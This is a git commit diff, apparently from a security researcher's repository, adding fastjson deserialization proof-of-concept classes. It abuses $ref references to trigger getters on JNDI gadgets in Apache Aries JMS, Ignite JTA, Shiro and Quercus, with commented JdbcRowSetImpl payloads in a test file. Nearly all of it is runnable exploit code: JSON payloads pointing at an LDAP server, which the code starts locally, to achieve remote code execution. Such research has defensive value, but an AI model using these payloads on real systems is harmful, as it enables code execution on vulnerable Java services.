feat:fastjson一种利用$ref几乎任意getter触发的方法

Author: “threedr3am”

fastjson/pom.xml

@@ -128,5 +128,35 @@
       <artifactId>quercus</artifactId>
       <version>4.0.63</version>
     </dependency>
+
+    <dependency>
+      <groupId>org.springframework.boot</groupId>
+      <artifactId>spring-boot-starter-security</artifactId>
+      <version>2.2.5.RELEASE</version>
+    </dependency>
+    <dependency>
+      <groupId>org.springframework</groupId>
+      <artifactId>spring-test</artifactId>
+      <version>5.1.6.RELEASE</version>
+      <scope>compile</scope>
+    </dependency>
+    <dependency>
+      <groupId>org.springframework</groupId>
+      <artifactId>spring-core</artifactId>
+      <version>5.1.6.RELEASE</version>
+      <scope>compile</scope>
+    </dependency>
+
+    <dependency>
+      <groupId>org.apache.aries.transaction</groupId>
+      <artifactId>org.apache.aries.transaction.jms</artifactId>
+      <version>2.0.0</version>
+    </dependency>
+
+    <dependency>
+      <groupId>org.apache.ignite</groupId>
+      <artifactId>ignite-jta</artifactId>
+      <version>2.8.0</version>
+    </dependency>
   </dependencies>
 </project>

fastjson/src/main/java/com/threedr3am/bug/fastjson/rce/AriesJMSPoc.java

@@ -0,0 +1,37 @@
+package com.threedr3am.bug.fastjson.rce;
+
+import com.alibaba.fastjson.JSON;
+import com.alibaba.fastjson.parser.ParserConfig;
+import com.threedr3am.bug.common.server.LdapServer;
+import java.io.IOException;
+
+/**
+ * todo 发现新的Fastjson利用面，通过$ref引用功能，可以任意触发大部分getter方法，理论可以通过此种方式RCE，还能在不开启AutoType的情况下，任意调用大部分当前反序列化对象的getter方法，若存在危险method，就能进行攻击
+ *
+ * <dependency>
+ *     <groupId>org.apache.aries.transaction</groupId>
+ *     <artifactId>org.apache.aries.transaction.jms</artifactId>
+ *     <version>2.0.0</version>
+ * </dependency>
+ *
+ * @author threedr3am
+ */
+public class AriesJMSPoc {
+
+  static {
+    //rmi server示例
+//    RmiServer.run();
+
+    //ldap server示例
+    LdapServer.run();
+  }
+
+  public static void main(String[] args) throws IOException {
+    ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
+
+    String json = "{\"@type\":\"org.apache.aries.transaction.jms.RecoverablePooledConnectionFactory\", \"tmJndiName\": \"ldap://localhost:43658/Calc\", \"tmFromJndi\": true, \"transactionManager\": {\"$ref\":\"$.transactionManager\"}}";
+    JSON.parse(json);
+  }
+
+
+}

fastjson/src/main/java/com/threedr3am/bug/fastjson/rce/AriesJMSPoc2.java

@@ -0,0 +1,37 @@
+package com.threedr3am.bug.fastjson.rce;
+
+import com.alibaba.fastjson.JSON;
+import com.alibaba.fastjson.parser.ParserConfig;
+import com.threedr3am.bug.common.server.LdapServer;
+import java.io.IOException;
+
+/**
+ * todo 发现新的Fastjson利用面，通过$ref引用功能，可以任意触发大部分getter方法，理论可以通过此种方式RCE，还能在不开启AutoType的情况下，任意调用大部分当前反序列化对象的getter方法，若存在危险method，就能进行攻击
+ *
+ * <dependency>
+ *     <groupId>org.apache.aries.transaction</groupId>
+ *     <artifactId>org.apache.aries.transaction.jms</artifactId>
+ *     <version>2.0.0</version>
+ * </dependency>
+ *
+ * @author threedr3am
+ */
+public class AriesJMSPoc2 {
+
+  static {
+    //rmi server示例
+//    RmiServer.run();
+
+    //ldap server示例
+    LdapServer.run();
+  }
+
+  public static void main(String[] args) throws IOException {
+    ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
+
+    String json = "{\"@type\":\"org.apache.aries.transaction.jms.internal.XaPooledConnectionFactory\", \"tmJndiName\": \"ldap://localhost:43658/Calc\", \"tmFromJndi\": true, \"transactionManager\": {\"$ref\":\"$.transactionManager\"}}";
+    JSON.parse(json);
+  }
+
+
+}

fastjson/src/main/java/com/threedr3am/bug/fastjson/rce/IgniteJtaPoc.java

@@ -0,0 +1,38 @@
+package com.threedr3am.bug.fastjson.rce;
+
+import com.alibaba.fastjson.JSON;
+import com.alibaba.fastjson.parser.ParserConfig;
+import com.threedr3am.bug.common.server.LdapServer;
+import java.io.IOException;
+
+/**
+ * todo 发现新的Fastjson利用面，通过$ref引用功能，可以任意触发大部分getter方法，理论可以通过此种方式RCE，还能在不开启AutoType的情况下，任意调用大部分当前反序列化对象的getter方法，若存在危险method，就能进行攻击
+ *
+ * fastjson <= 1.2.67
+ *
+ * <dependency>
+ *       <groupId>org.apache.ignite</groupId>
+ *       <artifactId>ignite-jta</artifactId>
+ *       <version>2.8.0</version>
+ * </dependency>
+ *
+ * @author threedr3am
+ */
+public class IgniteJtaPoc {
+
+  static {
+    //rmi server示例
+//    RmiServer.run();
+
+    //ldap server示例
+    LdapServer.run();
+  }
+
+  public static void main(String[] args) throws IOException {
+    ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
+
+    String json = "{\"@type\":\"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup\", \"jndiNames\":[\"ldap://localhost:43658/Calc\"], \"tm\": {\"$ref\":\"$.tm\"}}";
+    JSON.parse(json);
+  }
+
+}

fastjson/src/main/java/com/threedr3am/bug/fastjson/rce/QuercusPoc.java

@@ -3,9 +3,12 @@
 import com.alibaba.fastjson.JSON;
 import com.alibaba.fastjson.parser.ParserConfig;
 import com.threedr3am.bug.common.server.LdapServer;
+import org.springframework.security.web.savedrequest.DefaultSavedRequest;
 
 /**
- * fastjson <= 1.2.66 RCE，需要开启AutoType & JSON.parseObject
+ * todo 发现新的Fastjson利用面，通过$ref引用功能，可以任意触发大部分getter方法，理论可以通过此种方式RCE，还能在不开启AutoType的情况下，任意调用大部分当前反序列化对象的getter方法，若存在危险method，就能进行攻击
+ *
+ * fastjson <= 1.2.68 RCE，需要开启AutoType
  *
  *
  * quercus ResourceRef jndi gadget
@@ -30,7 +33,7 @@ public class QuercusPoc {
   public static void main(String[] args) {
     ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
 
-    String payload = "{\"@type\":\"com.caucho.config.types.ResourceRef\",\"lookupName\": \"ldap://localhost:43658/Calc\"}";//ldap方式
-    JSON.parseObject(payload);
+    String payload = "{\"@type\":\"com.caucho.config.types.ResourceRef\",\"lookupName\": \"ldap://localhost:43658/Calc\", \"value\": {\"$ref\":\"$.value\"}}";//ldap方式
+    JSON.parse(payload);
   }
 }

fastjson/src/main/java/com/threedr3am/bug/fastjson/rce/ShiroPoc2.java

@@ -0,0 +1,31 @@
+package com.threedr3am.bug.fastjson.rce;
+
+import com.alibaba.fastjson.JSON;
+import com.alibaba.fastjson.parser.ParserConfig;
+import com.threedr3am.bug.common.server.LdapServer;
+import java.io.IOException;
+
+/**
+ * todo 发现新的Fastjson利用面，通过$ref引用功能，可以任意触发大部分getter方法，理论可以通过此种方式RCE，还能在不开启AutoType的情况下，任意调用大部分当前反序列化对象的getter方法，若存在危险method，就能进行攻击
+ *
+ * fastjson <= 1.2.67
+ *
+ * @author threedr3am
+ */
+public class ShiroPoc2 {
+  static {
+    //rmi server示例
+//    RmiServer.run();
+
+    //ldap server示例
+    LdapServer.run();
+  }
+
+  public static void main(String[] args) throws IOException {
+    ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
+
+    String json = "{\"@type\":\"org.apache.shiro.jndi.JndiObjectFactory\",\"resourceName\":\"ldap://localhost:43658/Calc\",\"instance\":{\"$ref\":\"$.instance\"}}";
+    JSON.parse(json);
+
+  }
+}

fastjson/src/main/java/com/threedr3am/bug/fastjson/test/TestPoc.java

@@ -10,18 +10,70 @@
  * @author threedr3am
  */
 public class TestPoc {
-  static {
-    //rmi server示例
+
+    static {
+        //rmi server示例
 //    RmiServer.run();
 
-    //ldap server示例
-    LdapServer.run();
-  }
+        //ldap server示例
+//        LdapServer.run();
+    }
+
+    public static void main(String[] args) {
+//    MockHttpServletRequest mockReq = new MockHttpServletRequest();
+//    DefaultSavedRequest request = new DefaultSavedRequest(mockReq, new PortResolver() {
+//
+//      public int getServerPort(ServletRequest servletRequest) {
+//        return 0;
+//      }
+//    });
+//
+//    String str = JSON.toJSONString(request, SerializerFeature.WriteClassName);
+//    System.out.println(str);
+
+//      String str = "{\"rand1\":{\"@type\":\"java.lang.Class\",\"val\":\"com.sun.rowset.JdbcRowSetImpl\"},\"rand2\":{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://localhost:43658\",\"autoCommit\":true}";
+//      String str = "{\"b\":{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://localhost:43658\",\"autoCommit\":true}}";
+//    String str = "{\"@type\":\"org.springframework.security.web.savedrequest.DefaultSavedRequest\",\"contextPath\": {\"@type\":\"com.caucho.config.types.ResourceRef\",\"lookupName\": \"ldap://localhost:43658/Calc\"}}";
+        ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
+        String str = "{\"a\": {\"$ref\":\"$.class\"}}";
+        AAA aaa = JSON.parseObject(str, AAA.class);
+//        ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
+//        String str = "{\"a\": {\"$ref\": \"$.a\"}, \"b\": {\"$ref\": \"$.b\"}, \"c\": {\"$ref\": \"$.c\"}, \"d\": {\"$ref\": \"$.d\"}}";
+//        JSON.parseObject(str, AAA.class);
+//        AAA aaa = new AAA();
+        System.out.println(aaa.getA());
+
+//    JSON.parseObject(str);
+    }
+}
+
+class AAA {
+
+    private String a;
+
+    public String getA() {
+        System.out.println("call the getA method!...");
+        return null;
+    }
+
+    public void setA(String a) {
+        this.a = a;
+    }
+
+    public AAA getB() {
+        System.out.println("call the getB method!...");
+        return null;
+    }
+
+    public Object getC() {
+        System.out.println("call the getC method!...");
+        return null;
+    }
+
+    public String getD() {
+        System.out.println("call the getD method!...");
+        return null;
+    }
 
-  public static void main(String[] args) {
-    ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
 
-    String payload = "{\"@type\":\"\",\"aaaaa\":\"ldap://localhost:43658/Calc\"}";//ldap方式
-    JSON.parse(payload);
-  }
 }